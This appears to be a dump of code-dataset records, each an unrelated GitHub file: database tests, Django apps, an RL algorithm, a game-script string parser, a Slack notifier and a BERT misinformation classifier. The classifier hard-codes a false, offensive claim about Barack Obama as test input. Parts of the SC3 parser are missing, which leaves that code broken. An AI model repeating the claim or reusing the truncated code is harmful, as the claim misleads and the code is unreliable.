varchar(30),\nLast real,\nBid real,\nAsk real,\nChg real,\nPctChg real,\nVol bigint, \nOpen_Int bigint,\nIV double,\nRoot varchar(10),\nIsNonstandard varchar(10),\nUnderlying varchar(10),\nUnderlying_Price real, \nQuote_Time timestamp, \nLast_Trade_Date timestamp)\n\n\"\"\" % (self.file_to_read, list_fields)\n\n self.test_file_presnt_on_host_fs()\n if not self.found:\n mylog.warning(\"file is not presnt in the local fs %s..so this test will fail\" % self.file_to_read)\n return 0\n mylog.info(\"executing \\n%s\\n\" % exec_str)\n stmt1 = ibm_db.exec_immediate(self.conn, exec_str)\n self.mDb2_Cli.describe_columns(stmt1)\n\n dictionary = ibm_db.fetch_both(stmt1)\n #if dictionary:\n # mylog.info(\"dictionary keys %s\" % dictionary.keys())\n table = Texttable()\n table.set_deco(Texttable.HEADER)\n str_header = \"STRIKE Expiry Type Symbol Last Bid Ask Chg PctChg Vol Open_Int iv root IsNonstandard Underlying Underlying_Price Quote_Time Last_Trade_Date\"\n str_header = str_header.upper()\n header_list = str_header.split()\n size_list = [10, 20, 6, 30, 9, 9, 12, 10, 10, 8, 9, 12, 11,8, 11, 22, 21, 21]\n\n if self.mDb2_Cli.describe_cols:\n names_header = []\n for some_dic in self.mDb2_Cli.describe_cols:\n names_header.append(some_dic['name'])\n #size_list.append(20)\n table.header(names_header)\n\n else:\n table.header(header_list)\n\n table.set_cols_width(size_list)\n table.set_header_align(['l ' for _i in header_list])\n\n while dictionary:\n my_row = []\n cont = 0\n for _column in header_list:\n my_row.append(dictionary[cont])\n #my_row.append(dictionary[column])\n cont += 1\n table.add_row(my_row)\n dictionary = ibm_db.fetch_both(stmt1)\n mylog.info(\"\\n%s\\n\\n\" % table.draw())\n ibm_db.free_result(stmt1)\n except Exception as _i:\n self.result.addFailure(self,sys.exc_info())\n return -1\n\n return 0\n\n","repo_name":"asierra01/ibm_db_test","sub_path":"ibm_db_test_cases/ibm_db_JAVA_CSVREAD.py","file_name":"ibm_db_JAVA_CSVREAD.py","file_ext":"py","file_size_in_byte":16722,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38733634118","text":"# Sprawdzaj, czy podany string zawiera ciąg dowolnych małych liter rozdzielonych znakiem _, np. 
aab_cbbbc\n\nimport re\n\nplik = open('txt.txt', 'r', encoding='utf8')\n\ntxt = plik.read()\n\nif re.search(r\"[(\\D{1,})\\_(\\D{1,})]\", txt):\n print('zawiera')\nelse:\n print('nie')","repo_name":"KDebowiec/DevsMentoring","sub_path":"rozszerzenie/ReGex/regex3.py","file_name":"regex3.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32837269792","text":"import gensim\nimport gensim.downloader as api\nimport keras\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.neural_network import MLPClassifier\nimport tensorflow as tf\nfrom keras import layers\nimport numpy as np\nimport transformers\nimport torch\n\n# Load pre-trained model\nmodel_, tokenizer_, pretrained_weights = (transformers.BertModel, transformers.BertTokenizer, 'bert-base-cased')\ntokenizer = tokenizer_.from_pretrained(pretrained_weights)\nmodel = model_.from_pretrained(pretrained_weights)\n\n# Read the CSV for article information and text\narticles = pd.read_csv(\"Data for Misinformation - Sheet1.csv\")\n\n# Tokenize text\ntokenized = articles['Article Title'].apply((lambda x: tokenizer.encode(x[-512:], add_special_tokens=True)))\n\n# Padding so equal length\nmax_len = 0\nfor i in tokenized.values:\n if len(i) > max_len:\n max_len = len(i)\npadded = np.array([i + [0] * (max_len - len(i)) for i in tokenized.values])\nattention_mask = np.where(padded != 0, 1, 0)\n\n# Train model\ninput_ids = torch.tensor(np.array(padded, dtype=np.float64)).to(torch.int64)\nattention_mask = torch.tensor(np.array(attention_mask, dtype=np.float64)).to(torch.int64)\nwith torch.no_grad():\n last_hidden_states = model(input_ids, attention_mask=attention_mask)\n\n# Output features\nfeatures = np.array(last_hidden_states[0][:, 0, :])\n\n# Reformat the text to get rid of unnecessary characters\n# def fix_text(x):\n# list_corpus = x.strip(\".\").strip(\",\").strip(\"[\").strip(\"]\").strip(\";\").strip(\":\").split(\" \")\n# return model.infer_vector(list_corpus)\n\n\n# Create a list of vectors with their text fixed\n# vector = []\n# for art in range(article_text.shape[0]):\n# vector.append(fix_text(article_text[art]))\n\n\n# Create new file with vectors (NOT NEEDED ANYMORE)\n# def g(x):\n# dict_ = {True: 1, False: 0}\n# return dict_[x]\n# articles['Veracity Int'] = articles['Veracity'].apply(lambda x: g(x))\n#\n# articles['Vector'] = articles['Article Text'].apply(lambda x: fix_text(x))\n#\n# articles.to_csv(\"Model Input.csv\", index=False)\n\n\n# Read new file and create variables based on the inputs and outputs of the neural network\narticles = pd.read_csv(\"Model Input.csv\")\nX = features\ny = articles['Veracity Int']\n\n\n# Train test split the data\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n\n# Reformat all data into NumPy arrays\nX_train = np.array(X_train)\nX_test = np.array(X_test)\ny_train = np.array(y_train)\ny_test = np.array(y_test)\n\n\n# Create the sklearn classifier and train it (OBSOLETE)\n# clf = MLPClassifier(solver='lbfgs', alpha=1e-5, hidden_layer_sizes=(5, 2), random_state=1)\n# clf.fit(X_train, y_train)\n\n\n# Define the model constants\nmax_features = 20000\nembedding_dim = 128\nsequence_length = 500\n\n\n\n# Create the model\nmisinfo = keras.models.Sequential()\nmisinfo.add(keras.layers.Flatten(input_shape=[768,])) # X_train has 40 
features\nmisinfo.add(keras.layers.Dense(300, activation='relu'))\nmisinfo.add(keras.layers.Dense(100, activation='relu'))\nmisinfo.add(keras.layers.Dense(1, activation='sigmoid'))\n\n# Compile the model\nmisinfo.compile(loss=\"binary_crossentropy\", optimizer=\"adam\", metrics=[\"accuracy\"])\n\n# Train the model\nepochs = 30\n\nmisinfo.fit(X_train, y_train, epochs=epochs)\n\n\n# Test the model's accuracy\nmisinfo.evaluate(X_test, y_test)\n\n# Input your own statement\n\n_tokenizer_ = tokenizer.encode(\"Donald Trump is BEST president ever and Barack Obama is a muslim terrorist\",\n add_special_tokens=True)\n_padded = np.array(_tokenizer_ + [0] * (max_len - len(_tokenizer_)))\n_attention_mask = np.where(_padded != 0, 1, 0)\n\n# Train model\n_input_ids = torch.tensor(np.array(_padded, dtype=np.float64)).to(torch.int64).unsqueeze(0)\n_attention_mask = torch.tensor(np.array(_attention_mask, dtype=np.float64)).to(torch.int64).unsqueeze(0)\nwith torch.no_grad():\n last_hidden_states_ = model(_input_ids, attention_mask=_attention_mask)\nstatement = np.array(last_hidden_states_[0][:, 0, :])\n\nprint(misinfo.predict(statement))\n","repo_name":"MasterOfTartarus/FactOrMisinfo","sub_path":"newtextvectorization.py","file_name":"newtextvectorization.py","file_ext":"py","file_size_in_byte":4130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18111461932","text":"import os\n\nfrom processing_stages.run_facemorpher import run_facemorpher\nfrom processing_stages.scramble_picture import scramble_picture\nfrom processing_stages.validate_dirs_and_get_paths import \\\n validate_dirs_and_get_paths\nfrom processing_stages.working_paths import WorkingPaths\n\n\ndef morphify(input_dir: str,\n stranger_dir: str,\n output_dir: str) -> WorkingPaths:\n \"\"\"\n Makes a morphing pictures for\n I/Friend/Stranger photos in different mood types.\n \"\"\"\n working_paths = validate_dirs_and_get_paths(input_dir,\n stranger_dir,\n output_dir)\n run_facemorpher(working_paths)\n for morphing_frames in working_paths.output_paths.values():\n # Scramble every middle frame of mood-opposite frames.\n middle_frame_index = len(morphing_frames) // 2\n middle_frame_path = morphing_frames[middle_frame_index]\n scrambled_middle_frame_path = scramble_picture(middle_frame_path)\n\n # Original frame should be removed.\n morphing_frames.remove(middle_frame_path)\n morphing_frames.insert(middle_frame_index, scrambled_middle_frame_path)\n os.remove(middle_frame_path)\n\n return working_paths\n","repo_name":"Evgenius2020/morpher","sub_path":"src/morphify.py","file_name":"morphify.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13480879894","text":"from django.shortcuts import render\n\nfrom lecture.models import Lecture\n\nfrom lecture.forms import EditForm\nfrom lecture.forms2 import LectureForm\n\n\n# Create your views here.\ndef detail_lecture(request, *args, **kwargs):\n if request.method == 'GET':\n lecture = Lecture.objects.get(id=kwargs['lecture_id'])\n return render(request, 'detail_lecture.html', locals())\n\n\ndef create_lecture(request):\n if request.method == 'POST':\n form = LectureForm(request.POST)\n if form.is_valid():\n form.save()\n form = LectureForm()\n return render(request, 'create_course.html', locals())\n\n\ndef edit_lecture(request, *args, **kwargs):\n lecture_id = kwargs['lecture_id']\n if request.method == 'POST':\n form = EditForm(request.POST)\n if 
form.is_valid():\n form.save(lecture_id)\n form = EditForm()\n return render(request, 'edit_lecture.html', locals())\n","repo_name":"nikolaystanishev/HackBulgaria_Python101","sub_path":"cms/lecture/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"889116322","text":"import numpy as np\nimport cv2 as cv\nimport matplotlib.pyplot as plt \n# img = np.zeros((256,256,3),np.uint8)\n\n# img[100,100] = (0,0,255)\n# px = img[100,100]\n# # print(px)\n# # cv.imshow(\"image\",img)\n# # cv.waitKey(0)\n# print(img.shape)\n# print(img.dtype)\n# print(img.size)\nimg = cv.imread(\"C/Users/12925/Desktop/cv/images/02.jpg\")\nb,g,r = cv.split(img)\nimg2 = cv.merge((b,g,r))\ngray = cv.cvtColor(img,cv.COLOR_BGR2GRAY)\nhsv = cv.cvtColor(img,cv.COLOR_BGR2HSV)\ncv.imshow(\"img1\",img)\ncv.imshow(\"img\",hsv)\ncv.waitKey(0)","repo_name":"1292534569/Digital-Image-Processing","sub_path":"opencv_opration/test03.py","file_name":"test03.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22970624175","text":"\"\"\" sc3parse.py\nRecover the contents of string tables from SC3 files. Perhaps at some point \ndown the road, we'll deal with more aspects of the actual bytecode, if that \nends up being necessary.\n\n# Example usage\nThe sc3() container parses up a file. For looking through strings that have\nbeen mapped onto some character set, the usage should probably look something \nlike this:\n\n```\n #!/usr/bin/python3\n from sc3parse import *\n from my_charset import my_utf_charset\n\n my_script = sc3(my_file.sc3, my_uft_charset)\n\n for string in my_script.strings:\n for token in string:\n # Do something interesting\n # ...\n```\n\"\"\"\n\nfrom struct import pack, unpack\nfrom enum import Enum\n\nclass cmd(Enum):\n \"\"\" Command token types \"\"\"\n LINE_BREAK = 0x00\n CHARACTER_NAME = 0x01\n DIALOGUE_START = 0x02\n PRESENT_03 = 0x03\n SET_COLOR = 0x04\n UNK_05 = 0x05\n PRESENT_RESETALIGN = 0x08\n RUBY_BASE_START = 0x09\n RUBY_TEXT_START = 0x0a\n RUBY_TEXT_END = 0x0b\n SET_FONT_SIZE = 0x0c\n PRINT_PARALLEL = 0x0e\n CENTER_TEXT = 0x0f\n SET_TOP_MARGIN = 0x11\n SET_LEFT_MARGIN = 0x12\n GET_HARDCODED_VALUE = 0x13\n EVAL_EXPRESSION = 0x15\n PRESENT_18 = 0x18\n AUTO_FORWARD = 0x19\n AUTO_FORWARD_1A = 0x1a\n UNK_1E = 0x1e\n LINE_BREAK_ALT = 0x1f\n\n\n\"\"\" \nTable of geometry for commands. 
'None' indicates a variable-length command, \nwhich might require more parsing to determine the actual length.\n\"\"\"\ncommand_table = { \n cmd.LINE_BREAK: { 'type': 0x00, 'len': 1 },\n cmd.CHARACTER_NAME: { 'type': 0x01, 'len': 1 },\n cmd.DIALOGUE_START: { 'type': 0x02, 'len': 1 },\n cmd.PRESENT_03: { 'type': 0x03, 'len': 1 },\n cmd.SET_COLOR: { 'type': 0x04, 'len': None },\n cmd.UNK_05: { 'type': 0x05, 'len': 1 },\n cmd.PRESENT_RESETALIGN: { 'type': 0x08, 'len': 1 },\n cmd.RUBY_BASE_START: { 'type': 0x09, 'len': 1 },\n cmd.RUBY_TEXT_START: { 'type': 0x0a, 'len': 1 },\n cmd.RUBY_TEXT_END: { 'type': 0x0b, 'len': 1 },\n cmd.SET_FONT_SIZE: { 'type': 0x0c, 'len': 3 },\n cmd.PRINT_PARALLEL: { 'type': 0x0e, 'len': 1 },\n cmd.CENTER_TEXT: { 'type': 0x0f, 'len': 1 },\n cmd.SET_TOP_MARGIN: { 'type': 0x11, 'len': 3 },\n cmd.SET_LEFT_MARGIN: { 'type': 0x12, 'len': 3 },\n cmd.GET_HARDCODED_VALUE: { 'type': 0x13, 'len': 3 },\n cmd.EVAL_EXPRESSION: { 'type': 0x15, 'len': None },\n cmd.PRESENT_18: { 'type': 0x18, 'len': 1 },\n cmd.AUTO_FORWARD: { 'type': 0x19, 'len': 1 },\n cmd.AUTO_FORWARD_1A: { 'type': 0x1a, 'len': 1 },\n cmd.UNK_1E: { 'type': 0x1e, 'len': 1 },\n cmd.LINE_BREAK_ALT: { 'type': 0x1f, 'len': 1 },\n}\n\n\n\nclass sc3(object):\n \"\"\" An object representing a particular SC3 file.\n We are really only interested in parsing the string table atm. Strings are\n composed of \"tokens,\" which may be *characters* or *commands*. Character \n tokens are offsets into some game-specific character set which may not\n correspond [in any consistent, rigorous way] with encodings like UTF.\n\n The constructor takes two arguments:\n - 'filename', the name of some target SC3 file\n - 'charset', an array of characters used to map character tokens\n onto actual UTF characters. \n \"\"\"\n\n def __init__(self, filename, charset):\n\n self.charset = charset\n\n # Read the contents of the user-provided file\n with open(filename, \"rb\") as f:\n self.data = f.read()\n\n # Verify this is actually an SC3 file\n if (self.data[0x00:0x04] != b'SC3\\x00'):\n print(\"[!] 
{} is not an SC3 file\".format(filename))\n exit(-1)\n\n # Obtain offsets to various tables\n self.s_table = unpack(\" 0):\n cur += 1\n\n # All expression tokens end with a \"precedence\" byte\n precedence = self.data[cur]\n cur += 1\n\n return cur - expr_base\n\n\n def parse_strings(self):\n \"\"\" Populate self.strings with an array of string representations.\n Strings are composed of dictionary objects of the form:\n\n {\n 'type': , \n 'data': \n }\n \"\"\"\n # Start at the base of the string table\n string_cur = self.s_table\n num_entries = self.s_table_entries\n\n self.strings = []\n for i in range(0, num_entries):\n\n # Obtain an offset to some string in the file\n string_base = unpack(\"= 0x80):\n char = unpack(\">H\", self.data[cur:cur+2])[0]\n char_idx = char - 0x8000\n\n token['type'] = 'CHR'\n if (char_idx < len(self.charset)):\n token['data'] = self.charset[char_idx]\n else:\n token['data'] = '?'\n string.append(token)\n cur += 2\n\n # Handle command tokens\n if (token_type < 0x80):\n command = cmd(token_type)\n token['type'] = 'CMD'\n token['data'] = command\n\n # Parse expressions for variable-length commands\n if (command_table[command]['len'] == None):\n cur += 1\n expr_len = self._parse_expression(cur)\n cur += expr_len\n\n # Otherwise, just look up command size in the table\n else:\n cur += command_table[command]['len']\n\n # Append this token to our representation of the string\n string.append(token)\n\n self.strings.append(string)\n string_cur += 4\n\n","repo_name":"eigenform/vita-re","sub_path":"vntools/sc3parse.py","file_name":"sc3parse.py","file_ext":"py","file_size_in_byte":8079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15545549048","text":"from typing import TYPE_CHECKING, Any, Dict, Optional, Tuple, Type, Union\n\nimport torch as th\n\nfrom hmlf.algorithms.mpdqn.policies import MPDQNPolicy\nfrom hmlf.algorithms.pdqn import PDQN\n\nif TYPE_CHECKING:\n from hmlf.common.type_aliases import GymEnv, Schedule\n\nfrom hmlf.environments.wrap_environment import register_algorithm_for_wrap_environment, wrap_simple_hybrid\n\n\nclass MPDQN(PDQN):\n \"\"\"\n Deep Multi-Pass Parametrized Q-Network (MP-DQN)\n\n Paper: https://arxiv.org/abs/1810.06394\n Default hyperparameters are taken from the DQN-nature paper,\n except for the optimizer and learning rate that were taken from Stable Baselines defaults.\n\n :param policy: The policy model to use (MlpPolicy, CnnPolicy, ...)\n :param env: The environment to learn from (if registered in Gym, can be str)\n :param learning_rate_q: The learning rate for the Q-Network, it can be a function\n of the current progress remaining (from 1 to 0)\n :param learning_rate_parameter: The learning rate for the parameter network, it can be a function\n of the current progress remaining (from 1 to 0)\n :param buffer_size: size of the replay buffer\n :param learning_starts: how many steps of the model to collect transitions for before learning starts\n :param batch_size: Minibatch size for each gradient update\n :param tau: the soft update coefficient (\"Polyak update\", between 0 and 1) default 1 for hard update\n :param gamma: the discount factor\n param train_freq: Update the model every ``train_freq`` steps. 
Alternatively pass a tuple of frequency and unit\n like ``(5, \"step\")`` or ``(2, \"episode\")``.\n :param gradient_steps: How many gradient steps to do after each rollout (see ``train_freq``)\n Set to ``-1`` means to do as many gradient steps as steps done in the environment\n during the rollout.\n :param optimize_memory_usage: Enable a memory efficient variant of the replay buffer\n at a cost of more complexity.\n See https://github.com/DLR-RM/stable-baselines3/issues/37#issuecomment-637501195\n :param target_update_interval: update the target network every ``target_update_interval``\n environment steps.\n :param exploration_fraction: fraction of entire training period over which the exploration rate is reduced\n :param exploration_initial_eps: initial value of random action probability\n :param exploration_final_eps: final value of random action probability\n :param max_grad_norm: The maximum value for the gradient clipping\n :param tensorboard_log: the log location for tensorboard (if None, no logging)\n :param create_eval_env: Whether to create a second environment that will be\n used for evaluating the agent periodically. (Only available when passing string for the environment)\n :param policy_kwargs: additional arguments to be passed to the policy on creation\n :param verbose: the verbosity level: 0 no output, 1 info, 2 debug\n :param seed: Seed for the pseudo random generators\n :param device: Device (cpu, cuda, ...) on which the code should be run.\n Setting it to auto, the code will be run on the GPU if possible.\n :param _init_setup_model: Whether or not to build the network at the creation of the instance\n \"\"\"\n\n def __init__(\n self,\n policy: Type[MPDQNPolicy],\n env: Union[\"GymEnv\", str],\n learning_rate_q: Union[float, \"Schedule\"] = 1e-4,\n learning_rate_parameter: Union[float, \"Schedule\"] = 1e-4,\n buffer_size: int = 1000000,\n learning_starts: int = 50000,\n batch_size: Optional[int] = 32,\n tau: float = 1.0,\n gamma: float = 0.99,\n train_freq: Union[int, Tuple[int, str]] = 4,\n gradient_steps: int = 1,\n optimize_memory_usage: bool = False,\n target_update_interval: int = 10000,\n exploration_fraction: float = 0.1,\n exploration_initial_eps: float = 1.0,\n exploration_final_eps: float = 0.05,\n max_grad_norm: float = 10,\n tensorboard_log: Optional[str] = None,\n create_eval_env: bool = False,\n policy_kwargs: Optional[Dict[str, Any]] = None,\n verbose: int = 0,\n seed: Optional[int] = None,\n device: Union[th.device, str] = \"auto\",\n _init_setup_model: bool = True,\n ):\n\n super(MPDQN, self).__init__(\n policy=policy,\n env=env,\n learning_rate_q=learning_rate_q,\n learning_rate_parameter=learning_rate_parameter,\n buffer_size=buffer_size,\n learning_starts=learning_starts,\n batch_size=batch_size,\n tau=tau,\n gamma=gamma,\n train_freq=train_freq,\n gradient_steps=gradient_steps,\n optimize_memory_usage=optimize_memory_usage,\n target_update_interval=target_update_interval,\n exploration_fraction=exploration_fraction,\n exploration_initial_eps=exploration_initial_eps,\n exploration_final_eps=exploration_final_eps,\n max_grad_norm=max_grad_norm,\n tensorboard_log=tensorboard_log,\n create_eval_env=create_eval_env,\n policy_kwargs=policy_kwargs,\n verbose=verbose,\n seed=seed,\n device=device,\n _init_setup_model=_init_setup_model,\n )\n\n\nregister_algorithm_for_wrap_environment(MPDQN, 
wrap_simple_hybrid)\n","repo_name":"lorenzob123/HMLF","sub_path":"hmlf/algorithms/mpdqn/mpdqn.py","file_name":"mpdqn.py","file_ext":"py","file_size_in_byte":5408,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"22134997153","text":"from django.contrib import admin\nfrom django.contrib.auth import get_user_model\nfrom adminsortable2.admin import SortableAdminMixin\nfrom .models import Category, SubCategory, Product, ProductImage, LeadSection, Brand, WishList, CompareProduct, ProductReview\nfrom .forms import ProductForm\n\nfrom django.contrib.auth.models import User\nfrom django.utils.html import escape, mark_safe\n\n# Register your models here.\nUser = get_user_model()\n\n\nclass SubCategoryline(admin.StackedInline):\n model = SubCategory\n extra = 1\n exclude = ['slug']\n\n\nclass CategoryAdmin(SortableAdminMixin, admin.ModelAdmin):\n list_display = ('name', 'slug', 'add_subcategory', 'active',)\n search_fields = ('name',)\n list_filter = ('name',)\n exclude = ['slug']\n list_editable = ['active']\n inlines = [SubCategoryline]\n list_per_page = 20\n\n def add_subcategory(self, obj):\n return mark_safe(f'Add SubCategory')\n\n def formfield_for_foreignkey(self, db_field, request, **kwargs):\n id = request.GET.get('category')\n if db_field.name == 'category' and id:\n kwargs[\"queryset\"] = Category.objects.filter(id=int(id))\n return super().formfield_for_foreignkey(db_field, request, **kwargs)\n\n\nadmin.site.register(Category, CategoryAdmin)\n\n\nclass BrandAdmin(admin.ModelAdmin):\n list_display = ('name', 'slug')\n search_fields = ('name',)\n list_filter = ('name',)\n exclude = ['slug']\n list_per_page = 20\n\n\nadmin.site.register(Brand, BrandAdmin)\n\n\nclass ProductImageInline(admin.StackedInline):\n model = ProductImage\n extra = 0\n max_num = 5\n\n\nclass ProductAdmin(admin.ModelAdmin):\n inlines = [ProductImageInline]\n\n form = ProductForm\n list_display = [\"title\", \"category\",\n \"price\", \"active\"]\n search_fields = ('title', 'slug', 'category__name',\n 'active', 'tags__name')\n list_filter = ['category__name', 'active']\n list_editable = ['active', ]\n exclude = ['slug']\n list_per_page = 20\n\n\nadmin.site.register(Product, ProductAdmin)\n\n\nclass LeadSectionAdmin(admin.ModelAdmin):\n list_display = ('id', 'first_lead', 'second_lead', 'third_lead')\n\n def has_add_permission(self, request):\n return False if self.model.objects.count() > 0 else True\n\n list_per_page = 20\n\n\n# Register your models here.\nadmin.site.register(LeadSection, LeadSectionAdmin)\n\n\nclass WishListAdmin(admin.ModelAdmin):\n list_display = ('user', 'product')\n search_fields = ('user__username', 'product__title')\n list_per_page = 20\n\n\nadmin.site.register(WishList, WishListAdmin)\n\n\nclass CompareProductAdmin(admin.ModelAdmin):\n list_display = ('user', 'product')\n search_fields = ('user__username', 'product__title')\n list_per_page = 20\n\n\nadmin.site.register(CompareProduct, CompareProductAdmin)\n\n\nadmin.site.register(ProductReview)\n","repo_name":"MahmudulHassan5809/Ecommerce-Django","sub_path":"ecom/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12225967998","text":"from ast import Return\nfrom PyQt5 import uic,QtWidgets\nfrom PyQt5.QtWidgets import QHBoxLayout, QMessageBox, QPushButton, QTableWidget, QVBoxLayout, QWidget, QSizePolicy\nfrom PyQt5.QtGui import QIcon\nfrom numpy import 
mean\n\n\nsoma = 0 \n\ndef calculando(): \n primos = []\n campo_1 = int(calcular.spinBox.text())\n campo_2 = int(calcular.spinBox_2.text())\n\n # Verificar se o campo_2 é menos que o campo_1\n if campo_2 < campo_1: \n msgBox = QMessageBox()\n msgBox.setWindowTitle(\"Informação:\")\n msgBox.setIcon(msgBox.Information)\n msgBox.setText('O Segundo campo precisa ser maior que o primeiro')\n msgBox.exec()\n return\n\n # Lógica aplicada para calcular os intervalos dos numeros primos\n for i in range(campo_1, campo_2+1):\n qtd_divisores = 0\n for j in range(1, i+1):\n if i % j == 0:\n qtd_divisores +=1\n if qtd_divisores == 2:\n primos.append(i)\n\n # Soma, contagem e média dos números primos\n soma_dos_primos = sum(primos)\n contagem_dos_primos = len(primos)\n avg = mean(primos)\n \n # Impressão na tela dos resultados da consulta\n calcular.label_4.setText(\"Os Números Primos no Intervalo de: \" +str(campo_1) + ' e ' +str(campo_2) +\n ' São :\\n' + str(primos).replace('[','').replace(']',''))\n \n calcular.label_6.setText(\"A quantidade de números primos entre: \" +str(campo_1) + ' e ' +str(campo_2) +\n ' São :\\n' +str(contagem_dos_primos))\n\n calcular.label_7.setText(\"A soma de todos os números primos entre: \" +str(campo_1) + ' e ' +str(campo_2) +\n ' São :\\n' +str(soma_dos_primos))\n\n calcular.label_8.setText(\"A média aritmética dos números primos entre: \" +str(campo_1) + ' e ' +str(campo_2) +\n ' São :\\n' +str(avg).replace('nan','0'))\n\n # Fim da impressão\n\napp=QtWidgets.QApplication([])\ncalcular=uic.loadUi(\"calculadora.ui\")\ncalcular.setWindowIcon(QIcon(\"calc_icon.png\"))\ncalcular.pushButton.clicked.connect(calculando)\ncalcular.setStyleSheet('QPushButton {color: white}')\n\n\ncalcular.show()\napp.exec()","repo_name":"JoanesAraujo/Python-calculadora-interface-numeros-primos","sub_path":"main_calculadora.py","file_name":"main_calculadora.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14617765291","text":"#!/usr/bin/env python\n#coding: UTF-8\n\nimport json\nimport sys\nimport os\n\nimport requests\n\ndef send_slack_msg(message, channel=None, at_users='', botname='slackbot', color='good', blocktext=''):\n \"\"\"Send an audit log to Slack\n\n color can be \"good\", \"warning\", \"danger\" or any hex color code (#AABBCC)\n \"\"\"\n url = os.environ.get('SLACK_NOTIFY_URL', '')\n if not url:\n raise RuntimeError('SLACK_NOTIFY_URL not set')\n channel = channel or os.environ.get('SLACK_NOTIFY_CHANNEL', '')\n if not channel:\n raise RuntimeError('SLACK_NOTIFY_CHANNEL not set')\n\n at_users = at_users or os.environ.get('SLACK_NOTIFY_USERS', '')\n if not at_users:\n raise RuntimeError('SLACK_NOTIFY_USERS not set')\n\n headers = {'Content-Type': 'application/json'}\n msg = ''\n if isinstance(at_users, str):\n at_users = at_users.split(',')\n for u in at_users:\n msg += \"<@{}> \".format(u)\n msg += message\n\n params = {\n 'username': botname,\n 'icon_emoji': ':chicken:',\n 'channel': '#' + channel.strip('#'),\n }\n # See https://api.slack.com/docs/messages/builder for slack message attachments spec\n if blocktext:\n attachments = [{\n 'color': color,\n 'pretext': msg,\n 'text': blocktext,\n }]\n else:\n attachments = [{'text': msg, 'color': color}]\n\n params['attachments'] = attachments\n r = requests.post(url, data=json.dumps(params), headers=headers)\n r.raise_for_status()\n\ndef main():\n import argparse\n ap = argparse.ArgumentParser()\n ap.add_argument('--botname', 
default='slackbot')\n ap.add_argument('--at', default='')\n ap.add_argument('--color', default='good', choices=('good', 'bad'))\n ap.add_argument('channel')\n ap.add_argument('msg')\n\n args = ap.parse_args()\n\n assert all([' ' not in s for s in (args.channel, args.botname, args.at)])\n\n send_slack_msg(args.msg, args.channel, at_users=args.at.split(',') if args.at else [], botname=args.botname, color=args.color)\n\nif __name__ == '__main__':\n main()\n","repo_name":"haiwen/seafile-release-tools","sub_path":"android/utils/slack_notify.py","file_name":"slack_notify.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"5358018642","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Dec 28 13:16:07 2018\r\n\r\n@author: sevgi\r\n\"\"\"\r\n\r\ndictionary={\"it\",\"was\",\"the\",\"best\",\"of\",\"times\",\"you\",\"can\",\r\n \"add\",\"new\",\"words\",\"here\",\"are\"} \r\n\r\ndef isValid(string):\r\n #if length is 0 return false\r\n if(len(string)==0):\r\n return False;\r\n s2=\"\";\r\n for i in range(len(string)+1):\r\n #s2 is a word ,delete s2 and add the next letter into it\r\n if(s2 in dictionary):\r\n if(i!=len(string)):\r\n s2=string[i].lower()\r\n else:\r\n s2=\"\"#if the func reach the end of string ,add nothing\r\n else:#s2 is not a word, concatanete s2 with the next letter\r\n if(i!=len(string)):\r\n s2=s2+string[i].lower()\r\n if(s2==\"\"):\r\n return True\r\n else:\r\n return False\r\n\r\n#given string\r\nprint(isValid(\"itwasthebestoftimes\"))\r\nprint(isValid(\"youarethebest\"))\r\nprint(isValid(\"besttimesks\"))","repo_name":"sevgibayansalduzz/Algorithm-Design-and-Analysis","sub_path":"hw4/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31794816847","text":"\"\"\"empty message\n\nRevision ID: 0d8d5a59f530\nRevises: \nCreate Date: 2017-02-05 22:20:09.563791\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '0d8d5a59f530'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('fornavn', sa.String(length=250), nullable=True),\n sa.Column('efternavn', sa.String(length=250), nullable=True),\n sa.Column('tlf_nr', sa.String(length=10), nullable=True),\n sa.Column('email', sa.String(length=50), nullable=True),\n sa.Column('password', sa.LargeBinary(length=128), nullable=False),\n sa.Column('email_confirmed', sa.Boolean(), nullable=True),\n sa.Column('tlf_nr_confirmed', sa.Boolean(), nullable=True),\n sa.Column('created_on', sa.DateTime(), nullable=True),\n sa.Column('last_modified', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email'),\n sa.UniqueConstraint('tlf_nr')\n )\n op.create_table('morgenmad',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('dato', sa.Date(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n 